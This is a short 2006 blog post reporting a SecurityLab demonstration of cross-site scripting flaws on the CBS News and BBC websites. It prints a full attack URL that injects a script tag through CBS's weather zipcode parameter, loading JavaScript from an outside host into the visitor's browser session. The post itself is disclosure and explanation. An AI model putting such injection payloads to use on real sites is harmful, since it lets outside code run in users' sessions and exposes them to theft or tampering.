Tuesday, September 05, 2006

XSS Demonstration

SecurityLab posted a demonstration of Cross Site Scripting (XSS) vulnerabilities in CBS News and the BBC websites.

Looks like BBC has now fixed this flaw in their website but CBS News is still vulnerable.

The URL they provide for CBS is:
http://www.cbsnews.com/stories/2002/02/15/weather_local/
main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://
www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

The problem is with the zipcode part of the site through which one can check local weather.

In the above example, the custom news at http://www.securitylab.ru/test/sc.js is injected to the user's browser session.

The vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

read more ...

Posted by Jayesh at 8:21 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)